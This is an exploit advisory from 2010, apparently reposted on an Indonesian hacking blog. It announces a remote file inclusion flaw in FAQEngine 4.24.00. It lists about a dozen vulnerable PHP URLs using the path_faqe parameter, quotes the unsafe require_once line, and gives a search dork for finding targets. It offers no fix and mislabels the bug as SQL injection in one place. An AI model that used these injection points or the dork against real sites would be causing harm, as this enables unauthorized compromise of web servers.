FAQEngine 4.24.00 – Remote File Inclusion vulnerability

###################################################################################
#
[~] FAQEngine 4.24.00 – Remote File Inclusion vulnerability [ RFI ] #
[~] Author : kaMtiEz (kamzcrew@gmail.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : January 6, 2010 #
#
###################################################################################

[ Software Information ]

[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : “Think iT”
[+] Price : –
[+] Location : INDONESIA – JOGJA

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]

http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]

etc etc etc .. too much ..

[ ERROR IN ]

require_once($path_faqe.”/includes/global.inc.php”);

[ FIX ]

dunno .. :P~~

=====================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi … tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] KEEP MOVIN .. !
[+] INDONESIANCODER still r0x

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

Leave a comment | Trackback
Jan 12th, 2010 | Posted in Exploitasi | Share | Tweet | - 0 -
  1. iq134al
    Reply | Quote
    Jan 13th, 2010 at 07:00 | #1

    Tolong KK semua Penjelasannya Remote File Inclusion vulnerability. by NewBie
    PLIZZZZ

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">
RSS for comments on this post